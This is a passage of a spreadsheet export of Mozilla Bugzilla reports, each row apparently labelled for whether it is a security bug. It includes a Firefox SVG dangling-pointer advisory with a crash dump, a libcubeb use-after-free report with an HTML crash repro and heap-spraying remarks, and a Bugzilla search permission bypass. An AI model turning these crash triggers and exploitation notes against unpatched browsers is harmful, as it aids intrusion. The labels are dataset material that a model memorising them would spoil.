HU team chooses to localize the web/video content of masterfirefoxos.com.  This means, the localization tasks (excluding video/audio recording/mixing tasks) includes the following, and may not be limited to:
- localization of the "web" content - see the attached file - about 4000+ words
- localization of the "video" audio script - ~ 700 words  
- review and correction of website once the content is being staged
- screening voice talent (if you don't want to do it, let me know) prior to recording
- review of audio tracks with localized script
- review of mixing of video clips with localized audio
- review of the final website for your language and final signoff prior to product launch.
Timeline:
- there are lots of post production work involved after the initial translation
- each assembly and staging of content involves review and verification, some tasks have dependencies of another.
- web content localization is due on August 31
- video audio script is due on August 31
- other milestones yet to be mapped out
- site will be ready by end of Sept or early October.</t>
        </is>
      </c>
      <c r="X2952" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2953">
      <c r="A2953" t="n">
        <v>309952</v>
      </c>
      <c r="B2953" t="inlineStr">
        <is>
          <t>2005-09-25 03:38:50 -0700</t>
        </is>
      </c>
      <c r="C2953" t="inlineStr">
        <is>
          <t>[SECURITY] A boolean chart search with time tracking fields works for everybody</t>
        </is>
      </c>
      <c r="D2953" t="inlineStr">
        <is>
          <t>2010-06-24 16:03:52 -0700</t>
        </is>
      </c>
      <c r="E2953" t="n">
        <v>1</v>
      </c>
      <c r="F2953" t="n">
        <v>1</v>
      </c>
      <c r="G2953" t="n">
        <v>4</v>
      </c>
      <c r="H2953" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2953" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2953" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K2953" t="inlineStr">
        <is>
          <t>2.20</t>
        </is>
      </c>
      <c r="L2953" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2953" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2953" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2953" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2953" t="inlineStr"/>
      <c r="Q2953" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2953" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S2953" t="inlineStr">
        <is>
          <t>Bugzilla 3.2</t>
        </is>
      </c>
      <c r="T2953" t="n">
        <v>1</v>
      </c>
      <c r="U2953" t="n">
        <v>0</v>
      </c>
      <c r="V2953" t="n">
        <v>38</v>
      </c>
      <c r="W2953" t="inlineStr">
        <is>
          <t>A user can execute a boolean chart search that has a time tracking field even
though the user isn't in the group defined by timetrackinggroup param. This way
one could search for all bugs that have worked time equal to 2 and get a list of
all bugs that have taken 2 hours to finish. Time tracking fields are not shown
on the drop-down for these users so URL hacking or a previously saved query
needs to be used to trigger this.</t>
        </is>
      </c>
      <c r="X2953" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2954">
      <c r="A2954" t="n">
        <v>648160</v>
      </c>
      <c r="B2954" t="inlineStr">
        <is>
          <t>2011-04-06 16:34:08 -0700</t>
        </is>
      </c>
      <c r="C2954" t="inlineStr">
        <is>
          <t>Mozilla Firefox SVGPointList.appendItem Remote Code Execution Vulnerability (ZDI-CAN-1144)</t>
        </is>
      </c>
      <c r="D2954" t="inlineStr">
        <is>
          <t>2011-10-24 20:28:38 -0700</t>
        </is>
      </c>
      <c r="E2954" t="n">
        <v>1</v>
      </c>
      <c r="F2954" t="n">
        <v>1</v>
      </c>
      <c r="G2954" t="n">
        <v>3</v>
      </c>
      <c r="H2954" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2954" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2954" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K2954" t="inlineStr">
        <is>
          <t>1.9.2 Branch</t>
        </is>
      </c>
      <c r="L2954" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2954" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2954" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2954" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2954" t="inlineStr">
        <is>
          <t>[sg:critical?] fixed by 648094</t>
        </is>
      </c>
      <c r="Q2954" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2954" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2954" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2954" t="n">
        <v>1</v>
      </c>
      <c r="U2954" t="n">
        <v>0</v>
      </c>
      <c r="V2954" t="n">
        <v>6</v>
      </c>
      <c r="W2954" t="inlineStr">
        <is>
          <t>Created attachment 524302
PoC
ZDI-CAN-1144: Mozilla Firefox SVGPointList.appendItem Remote Code Execution Vulnerability
-- CVSS ----------------------------------------------------------------
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)
-- ABSTRACT ------------------------------------------------------------
TippingPoint has identified a vulnerability affecting the following products:
    Mozilla Firefo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code responsible for parsing SVG polygon objects. The code within nsSVGPointList::AppendElement() does not account for user defined getter methods modifying or destroying the parent object during a repaint. An attacker can abuse this flaw to create a dangling pointer which is referenced during the traversal of the SVG container hierarchy. This can be leveraged to execute arbitrary code within the context of the browser.
Version(s)  tested: 3.6.13
Platform(s) tested: Win XP SP3
From content/svg/content/src/nsSVGPointList.cpp:
NS_IMETHODIMP nsSVGPointList::AppendItem(nsIDOMSVGPoint *newItem,
                                         nsIDOMSVGPoint **_retval) {
  ...
  AppendElement(newItem);
  NS_ADDREF(*_retval);
  return NS_OK;
}
nsSVGPointList::AppendElement(nsIDOMSVGPoint* aElement) {
  ...
  mPoints.AppendElement(aElement);
  ...
}
As one can see potentially rogue implementation of nsIDOMSVGPoint is added to |mPoints| collection without check for being trusted/native. Our 
|mPoints| object's getters will be called at least twice. It is important to not break anything during the append itself (when modification event is dispatched) as that most probably would end up with non-exploitable condition. But after that, during the second method call (repaint event), removal of SVGPointElement and related frames leads to the following situation:
(194.198): Access violation - code c0000005 (!!! second chance !!!)
eax=c1c2c3e0 ebx=03c48300 ecx=053db000 edx=053db334 esi=c1c2c3c4
edi=03ced850
eip=102f1473 esp=0012ebfc ebp=0012ec20 iopl=0         nv up ei pl zr na
pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000            
efl=00000246
xul!nsCachedStyleData::GetStyleSVG:
102f1473 8b00            mov     eax,dword ptr [eax] 
ds:0023:c1c2c3e0=????????
0:000&gt; k
ChildEBP RetAddr
0012e838 101c0196 xul!nsCachedStyleData::GetStyleSVG
0012e840 102fab28 xul!nsStyleContext::GetStyleSVG+0xb
0012e848 10631e1e xul!nsIFrame::GetStyleSVG+0x9
0012e860 10631f5f xul!nsSVGGeometryFrame::SetupCairoFill+0x14
0012e8a0 1082fbc7 xul!nsSVGPathGeometryFrame::Render+0xa9
0012e8ec 10758628 xul!nsSVGPathGeometryFrame::PaintSVG+0x31
0012e9bc 107587d3 xul!nsSVGUtils::PaintFrameWithEffects+0x227
0012e9dc 10758628 xul!nsSVGDisplayContainerFrame::PaintSVG+0x30
0012eaac 107588c2 xul!nsSVGUtils::PaintFrameWithEffects+0x227
0012eb20 10758902 xul!nsSVGOuterSVGFrame::Paint+0xdb
0012eb3c 100d54b3 xul!nsDisplaySVG::Paint+0x24 0012eb4c 100b67ac
xul!nsDisplayList::Paint+0x23
0012eb60 100d54b3 xul!nsDisplayClip::Paint+0x2c
0012eb70 100b67ac xul!nsDisplayList::Paint+0x23
0012eb84 100d54b3 xul!nsDisplayClip::Paint+0x2c
0012eb94 100b67ac xul!nsDisplayList::Paint+0x23
0012eba8 100d5908 xul!nsDisplayClip::Paint+0x2c 0012ee8c 1018a3af
xul!nsLayoutUtils::PaintFrame+0x1b8
0012eea8 1018a2b0 xul!PresShell::Paint+0x4f
0012ef10 1017e647 xul!nsViewManager::RenderViews+0xd0
0012ef7c 100de47e xul!nsViewManager::Refresh+0x1a7
0012efd8 100cb1da xul!nsViewManager::DispatchEvent+0x29e
0012f004 101915a5 xul!HandleEvent+0x10a
0012f018 101915fb xul!nsWindow::DispatchEvent+0x25 0012f02c 100afa78
xul!nsWindow::DispatchWindowEvent+0x13
0012f220 100bad7a xul!nsWindow::OnPaint+0x4a8 0012f32c 100d00e5
xul!nsWindow::ProcessMessage+0x15a
0012f368 7e368734 xul!nsWindow::WindowProc+0xf5
0012f394 7e368816 USER32!InternalCallWinProc+0x28 0012f3fc 7e378ea0
USER32!UserCallWinProcCheckWow+0x150
0012f450 7e378eec USER32!DispatchClientMessage+0xa3
0012f478 7c90e473 USER32!__fnDWORD+0x24
0012f49c 7e3694d2 ntdll!KiUserCallbackDispatcher+0x13
0012f4e4 7e3696c7 USER32!NtUserDispatchMessage+0xc
0012f4f4 746ef75e USER32!DispatchMessageA+0xf 0012f52c 746f0078
MSCTF!CModalLoop::WaitRemoveMessage+0x6f
0012f54c 746f0138 MSCTF!CModalLoop::WaitHandleWndMessages+0x127
0012f588 746f067d MSCTF!CModalLoop::BlockFn+0xb4 0012f80c 746f0b92
MSCTF!CProxy::SendReceive+0x1b1
0012f820 746f0ffa MSCTF!CMarshalParamCreator::SendReceive+0x15
0012f88c 746f1738 MSCTF!CProxy::proxy_Param+0x455
0012f8b8 746ed307 MSCTF!CProxyITfLangBarItemSink::OnUpdate+0x3c
0012f8d0 746f0308 MSCTF!CLangBarItemMgr::OnUpdateHandler+0x36
0012f9f4 7e368734 MSCTF!CicMarshalWndProc+0xea
0012fa20 7e368816 USER32!InternalCallWinProc+0x28
0012fa88 7e3689cd USER32!UserCallWinProcCheckWow+0x150
0012fae8 7e368a10 USER32!DispatchMessageWorker+0x306
0012faf8 100d23ae USER32!DispatchMessageW+0xf
0012fb60 0035eeea xul!nsAppShell::ProcessNextNativeEvent+0xae
0012fb84 100f4115 nspr4!PR_IntervalNow+0x1a
0012fbc0 1015fa66 xul!nsThread::ProcessNextEvent+0x155
0012fc00 1022a073 xul!mozilla::ipc::MessagePump::Run+0x196
0012fc3c 1022a03b xul!MessageLoop::RunHandler+0x26
0012fc74 10229140 xul!MessageLoop::Run+0x1f
0012fc80 1022a1eb xul!nsBaseAppShell::Run+0x34 0012fc8c 1002e9fd
xul!nsAppStartup::Run+0x1e
0012ff34 0040133b xul!XRE_main+0xdc3
0012ff80 004016c2 firefox!wmain+0x33b
0012ffc0 7c817077 firefox!__tmainCRTStartup+0x152
0012fff0 00000000 kernel32!BaseProcessStart+0x23
-- CREDIT --------------------------------------------------------------
This vulnerability was discovered by:
    * regenrecht</t>
        </is>
      </c>
      <c r="X2954" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2955">
      <c r="A2955" t="n">
        <v>297200</v>
      </c>
      <c r="B2955" t="inlineStr">
        <is>
          <t>2005-06-09 07:22:06 -0700</t>
        </is>
      </c>
      <c r="C2955" t="inlineStr">
        <is>
          <t>Linkify (add links) bug count to buglist on keyword edit pages (editkeywords.cgi)</t>
        </is>
      </c>
      <c r="D2955" t="inlineStr">
        <is>
          <t>2005-07-10 16:41:25 -0700</t>
        </is>
      </c>
      <c r="E2955" t="n">
        <v>1</v>
      </c>
      <c r="F2955" t="n">
        <v>1</v>
      </c>
      <c r="G2955" t="n">
        <v>4</v>
      </c>
      <c r="H2955" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2955" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2955" t="inlineStr">
        <is>
          <t>User Interface</t>
        </is>
      </c>
      <c r="K2955" t="inlineStr">
        <is>
          <t>2.19</t>
        </is>
      </c>
      <c r="L2955" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2955" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2955" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2955" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2955" t="inlineStr"/>
      <c r="Q2955" t="inlineStr">
        <is>
          <t>P4</t>
        </is>
      </c>
      <c r="R2955" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2955" t="inlineStr">
        <is>
          <t>Bugzilla 2.22</t>
        </is>
      </c>
      <c r="T2955" t="n">
        <v>1</v>
      </c>
      <c r="U2955" t="n">
        <v>0</v>
      </c>
      <c r="V2955" t="n">
        <v>10</v>
      </c>
      <c r="W2955" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050606 Firefox/1.0.4
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050606 Firefox/1.0.4
The pages behind editkeywords.cgi (list and edit template) should linkify the
bug count to buglist as describekeywords.cgi does.
Reproducible: Always
Steps to Reproduce:</t>
        </is>
      </c>
      <c r="X2955" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2956">
      <c r="A2956" t="n">
        <v>1179484</v>
      </c>
      <c r="B2956" t="inlineStr">
        <is>
          <t>2015-07-01 14:20:48 -0700</t>
        </is>
      </c>
      <c r="C2956" t="inlineStr">
        <is>
          <t>libcubeb MediaStream use-after-free</t>
        </is>
      </c>
      <c r="D2956" t="inlineStr">
        <is>
          <t>2024-05-30 09:02:53 -0700</t>
        </is>
      </c>
      <c r="E2956" t="n">
        <v>1</v>
      </c>
      <c r="F2956" t="n">
        <v>1</v>
      </c>
      <c r="G2956" t="n">
        <v>3</v>
      </c>
      <c r="H2956" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2956" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2956" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K2956" t="inlineStr">
        <is>
          <t>38 Branch</t>
        </is>
      </c>
      <c r="L2956" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2956" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2956" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2956" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2956" t="inlineStr">
        <is>
          <t>[adv-main40+][adv-esr38.7+]</t>
        </is>
      </c>
      <c r="Q2956" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2956" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2956" t="inlineStr">
        <is>
          <t>mozilla42</t>
        </is>
      </c>
      <c r="T2956" t="n">
        <v>1</v>
      </c>
      <c r="U2956" t="n">
        <v>0</v>
      </c>
      <c r="V2956" t="n">
        <v>44</v>
      </c>
      <c r="W2956" t="inlineStr">
        <is>
          <t>Created attachment 8628485
repro.html
User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Build ID: 20150525141253
Steps to reproduce:
&lt;!doctype html&gt;
&lt;script&gt;
  new AudioContext("telephony").createMediaStreamDestination();
  location.href = "javascript:'and now we wait...'";
&lt;/script&gt;
Actual results:
A MediaStream object is created, which is used on three different threads: the main thread, a graph thread and a libcubeb thread. From the source at /dome/media/MediaStreamGraph.h, it appears the code tries to take into account the first two with regard to object life-time. However, I found that simply creating and deleting an object (see repro) will cause the object to be garbage collected at some point, before all references are deleted. This which will cause an access violation at 0x5a5a5a5a - a canary value to detect use-after-free. This seem to happen in the thread created for the wasapi_stream_render_loop function as well as the graph thread.
Expected results:
No use-after-free.
Additional info:
The following WinDBG breakpoints may be useful while debugging:
bm xul!mozilla::MediaStream::MediaStream ".printf \"thread %X: call %y\\r\\n\", @$tid,@eip;gu;.printf \"  return new MediaStream = %X\\r\\n\",@eax;g"
bm xul!mozilla::MediaStream::~MediaStream ".printf\"thread %X: call %y MediaStream = %X\\r\\n\",@$tid,@eip,@ecx;g"
bm xul!mozilla::MediaStreamGraphImpl::MediaStreamGraphImpl ".printf \"thread %X: call %y\\r\\n\", @$tid,@eip;gu;.printf \"  return new MediaStreamGraphImpl = %X\\r\\n\",@eax;g"
bm xul!mozilla::MediaStreamGraphImpl::AddStream ".printf \"thread %X: call %y MediaStreamGraphImpl = %X, MediaStream = %X\\r\\n\",@$tid,@eip,@ecx,poi(@esp+4);g"
bm xul!mozilla::MediaStreamGraphImpl::RemoveStream ".printf \"thread %X: call %y MediaStreamGraphImpl = %X, MediaStream = %X\\r\\n\",@$tid,@eip,@ecx,poi(@esp+4);g"
bm xul!mozilla::MediaStreamGraphImpl::~MediaStreamGraphImpl ".printf\"thread %X: call %y MediaStreamGraphImpl = %X\\r\\n\",@$tid,@eip,@ecx;g"
bm xul!mozilla::GraphDriver::GraphDriver ".printf \"thread %X: call %y MediaStreamGraphImpl = %X\\r\\n\",@$tid,@eip,poi(@esp+4);gu;.printf \"  return new GraphDriver = %X\\r\\n\",@eax;g"
bm xul!mozilla::GraphDriver::~GraphDriver ".printf\"thread %X: call %y GraphDriver = %X\\r\\n\",@$tid,@eip,@ecx;g"
bm xul!mozilla::ThreadedDriver::ThreadedDriver ".printf \"thread %X: call %y MediaStreamGraphImpl = %X\\r\\n\",@$tid,@eip,poi(@esp+4);gu;.printf \"  return new ThreadedDriver = %X\\r\\n\",@eax;g"
bm xul!mozilla::ThreadedDriver::Start ".printf \"thread %X: call %y ThreadedDriver = %X\\r\\n\",@$tid,@eip,@ecx;g"
bm xul!mozilla::ThreadedDriver::Stop ".printf \"thread %X: call %y ThreadedDriver = %X\\r\\n\",@$tid,@eip,@ecx;g"
bm xul!mozilla::ThreadedDriver::~ThreadedDriver ".printf\"thread %X: call %y ThreadedDriver = %X\\r\\n\",@$tid,@eip,@ecx;g"
bm xul!mozilla::AudioCallbackDriver::AudioCallbackDriver ".printf \"thread %X: call %y MediaStreamGraphImpl = %X\\r\\n\",@$tid,@eip,poi(@esp+4);gu;.printf \"  return new AudioCallbackDriver = %X\\r\\n\",@eax;g"
bm xul!`anonymous*namespace'::wasapi_stream_render_loop ".printf \"thread %X: enter wasapi_stream_render_loop\\r\\n\",@$tid;gu;.printf \"thread %X: exit wasapi_stream_render_loop\\r\\n\",@$tid;g"
sx- -c ".printf \"thread %X: Access violation\\r\\n\",@$tid;g" av
Here's a dump of the output created by these breakpoints during a crash:
thread C88: call xul!mozilla::AudioCallbackDriver::AudioCallbackDriver (66cb9e11) MediaStreamGraphImpl = 16C2E0C0
thread C88: call xul!mozilla::GraphDriver::GraphDriver (66cba3a0) MediaStreamGraphImpl = 16C2E0C0
  return new GraphDriver = 16CFB000
thread C88: call xul!mozilla::MediaStream::MediaStream (66cc4384)
  return new MediaStream = 11646A20
thread C88: call xul!mozilla::MediaStreamGraphImpl::MediaStreamGraphImpl (66cc4513)
thread C88: call xul!mozilla::ThreadedDriver::ThreadedDriver (66cba569) MediaStreamGraphImpl = 16C2E8A0
thread C88: call xul!mozilla::GraphDriver::GraphDriver (66cba3a0) MediaStreamGraphImpl = 16C2E8A0
  return new GraphDriver = 16C8C860
thread C88: call xul!mozilla::MediaStream::MediaStream (66cc4384)
  return new MediaStream = 16286CF0
thread C88: call xul!mozilla::MediaStream::MediaStream (66cc4384)
  return new MediaStream = 11646BB0
thread C88: call xul!mozilla::ThreadedDriver::Start (66cc0435) ThreadedDriver = 16C8C860
thread 908: call xul!mozilla::MediaStreamGraphImpl::AddStream (66cc7548) MediaStreamGraphImpl = 16C2E8A0, MediaStream = 16286CF0
thread E1C: enter wasapi_stream_render_loop
thread E1C: call xul!mozilla::MediaStreamGraphImpl::AddStream (66cc7548) MediaStreamGraphImpl = 16C2E0C0, MediaStream = 11646A20
thread E1C: call xul!mozilla::MediaStreamGraphImpl::AddStream (66cc7548) MediaStreamGraphImpl = 16C2E0C0, MediaStream = 11646BB0
thread 908: call xul!mozilla::MediaStreamGraphImpl::RemoveStream (66cda097) MediaStreamGraphImpl = 16C2E8A0, MediaStream = 16286CF0
thread 908: call xul!mozilla::MediaStream::~MediaStream (66cc5c01) MediaStream = 16286CF0
(1cc.908): Access violation - code c0000005 (first chance)
thread 908: Access violation
(1cc.e1c): Access violation - code c0000005 (first chance)
thread E1C: Access violation
(1cc.e1c): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=0009f900 ecx=00000008 edx=00000000 esi=00000002 edi=5a5a5a5a
eip=66ce636b esp=0c5dfa14 ebp=16286cf0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
xul!mozilla::StreamBuffer::FindTrack+0x12:
66ce636b 3b07            cmp     eax,dword ptr [edi]  ds:0023:5a5a5a5a=????????
Btw. I wonder why Firefox is still using 0x5a to fill freed memory, as this results in addresses that are theoretically reachable by heap-spraying. As a mitigation against exploitation, it would make more sense to spray with a value between 0xC0 and 0xFF. Such values would result in addresses that are too high to be allocated in 32-bit Windows.</t>
        </is>
      </c>
      <c r="X2956" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2957">
      <c r="A2957" t="n">
        <v>1389538</v>
      </c>
      <c r="B2957" t="inlineStr">
        <is>
          <t>2017-08-11 09:02:37 -0700</t>
        </is>
      </c>
      <c r="C2957" t="inlineStr">
        <is>
          <t>Fix django-rest-framework deprecation warnings about 'rest_framework.filters'</t>
        </is>
      </c>
      <c r="D2957" t="inlineStr">
        <is>
          <t>2017-10-31 05:07:27 -0700</t>
        </is>
      </c>
      <c r="E2957" t="n">
        <v>1</v>
      </c>
      <c r="F2957" t="n">
        <v>1</v>
      </c>
      <c r="G2957" t="n">
        <v>7</v>
      </c>
      <c r="H2957" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2957" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J2957" t="inlineStr">
        <is>
          <t>Treeherder: API</t>
        </is>
      </c>
      <c r="K2957" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L2957" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2957" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2957" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2957" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2957" t="inlineStr">
        <is>
          <t>[lang=py]</t>
        </is>
      </c>
      <c r="Q2957" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2957" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2957" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2957" t="n">
        <v>1</v>
      </c>
      <c r="U2957" t="n">
        <v>0</v>
      </c>
      <c r="V2957" t="n">
        <v>9</v>
      </c>
      <c r="W2957" t="inlineStr">
        <is>
          <t>Seen whilst running `PYTHONWARNINGS=once pytest` from the Vagrant environment [1].
tests/webapp/api/test_job_details_api.py::test_job_details
  /home/vagrant/python/lib/python2.7/site-packages/rest_framework/filters.py:74: DeprecationWarning: The built in 'rest_framework.filters.DjangoFilterBackend' is deprecated. You should use 'django_filters.rest_framework.DjangoFilterBackend' instead.
    DeprecationWarning
  /home/vagrant/python/lib/python2.7/site-packages/rest_framework/filters.py:50: DeprecationWarning: The built in 'rest_framework.filters.FilterSet' is deprecated. You should use 'django_filters.rest_framework.FilterSet' instead.
    DeprecationWarning
A grep for `rest_framework.filters` isn't overly helpful, since most of the usages import using `from X import Y` form, so instead I'd suggest a ripgrep [2] search of something like this (there are still some false positives, but fairly manageable):
$ rg -w 'filters' -t py
treeherder\model\search.py
29:                            filters=[])
treeherder\model\models.py
1538:    def for_jobs(self, *jobs, **filters):
1540:        caller-provided django filters.
1543:        :param filters: filters to apply to text log errors"""
1546:            **filters)
treeherder\webapp\api\classifiedfailure.py
3:import rest_framework_filters as filters
18:class ClassifiedFailureFilter(filters.FilterSet):
treeherder\webapp\api\jobs.py
7:from rest_framework import (filters,
605:    class JobDetailFilter(filters.FilterSet):
607:        class NumberInFilter(django_filters.filters.BaseInFilter,
632:    filter_backends = [filters.DjangoFilterBackend]
treeherder\webapp\api\performance_data.py
7:                            filters,
154:    filter_backends = [filters.OrderingFilter]
249:    filter_backends = (filters.DjangoFilterBackend, filters.OrderingFilter)
276:    filter_backends = (filters.DjangoFilterBackend, filters.OrderingFilter)
344:    filter_backends = (filters.DjangoFilterBackend, filters.OrderingFilter)
treeherder\webapp\api\utils.py
7:class NumberInFilter(django_filters.filters.BaseInFilter,
12:class CharInFilter(django_filters.filters.BaseInFilter,
--
[1] https://treeherder.readthedocs.io/installation.html
[2] https://github.com/BurntSushi/ripgrep</t>
        </is>
      </c>
      <c r="X2957" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2958">
      <c r="A2958" t="n">
        <v>530214</v>
      </c>
      <c r="B2958" t="inlineStr">
        <is>
          <t>2009-11-20 15:41:39 -0800</t>
        </is>
      </c>
      <c r="C2958" t="inlineStr">
        <is>
          <t>#remove anchor tag doesn't have an associated FAQ entry</t>
        </is>
      </c>
      <c r="D2958" t="inlineStr">
        <is>
          <t>2013-05-07 21:49:51 -0700</t>
        </is>
      </c>
      <c r="E2958" t="n">
        <v>1</v>
      </c>
      <c r="F2958" t="n">
        <v>1</v>
      </c>
      <c r="G2958" t="n">
        <v>6</v>
      </c>
      <c r="H2958" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2958" t="inlineStr">
        <is>
          <t>Websites Graveyard</t>
        </is>
      </c>
      <c r="J2958" t="inlineStr">
        <is>
          <t>getpersonas.com</t>
        </is>
      </c>
      <c r="K2958" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2958" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2958" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2958" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2958" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2958" t="inlineStr"/>
      <c r="Q2958" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2958" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2958" t="inlineStr">
        <is>
          <t>2.0</t>
        </is>
      </c>
      <c r="T2958" t="n">
        <v>1</v>
      </c>
      <c r="U2958" t="n">
        <v>0</v>
      </c>
      <c r="V2958" t="n">
        <v>4</v>
      </c>
      <c r="W2958" t="inlineStr">
        <is>
          <t>I searched for open bugs on this; apologies if it's already filed.
STR:
1. Load http://sm-personas01.mozilla.org/en-US/persona/25664
2. Click on "Wear this Persona"
3. When it pops up, click on the "How do I remove this Persona?" link
Expected Results:
Goes to the anchor tag/question in the FAQ about removing a particular Persona
Actual Results:
http://sm-personas01.mozilla.org/en-US/faq#remove doesn't have an associated named anchor</t>
        </is>
      </c>
      <c r="X2958" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2959">
      <c r="A2959" t="n">
        <v>1893270</v>
      </c>
      <c r="B2959" t="inlineStr">
        <is>
          <t>2024-04-24 12:04:33 -0700</t>
        </is>
      </c>
      <c r="C2959" t="inlineStr">
        <is>
          <t>AddressSanitizer: attempting free on address which was not malloc()-ed on cairo_cff_font_destroy -&gt; free</t>
        </is>
      </c>
      <c r="D2959" t="inlineStr">
        <is>
          <t>2024-09-18 19:41:16 -0700</t>
        </is>
      </c>
      <c r="E2959" t="n">
        <v>1</v>
      </c>
      <c r="F2959" t="n">
        <v>1</v>
      </c>
      <c r="G2959" t="n">
        <v>3</v>
      </c>
      <c r="H2959" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2959" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2959" t="inlineStr">
        <is>
          <t>Printing: Output</t>
        </is>
      </c>
      <c r="K2959" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2959" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2959" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2959" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2959" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2959" t="inlineStr">
        <is>
          <t xml:space="preserve">[reporter-external] [client-bounty-form] [verif?] [adv-main126+] [adv-ESR115.11+] </t>
        </is>
      </c>
      <c r="Q2959" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2959" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S2959" t="inlineStr">
        <is>
          <t>127 Branch</t>
        </is>
      </c>
      <c r="T2959" t="n">
        <v>1</v>
      </c>
      <c r="U2959" t="n">
        <v>0</v>
      </c>
      <c r="V2959" t="n">
        <v>41</v>
      </c>
      <c r="W2959" t="inlineStr">
        <is>
          <t>Created attachment 9398465
asan.attemptfree1.txt
After Save to PDF from print dialog, the entire browser crashed, gladly I able to get detailed analysis from AddressSanitizer, the crash is attempting free on address which was not malloc()-ed which points to gfx/cairo.
## Tested on:
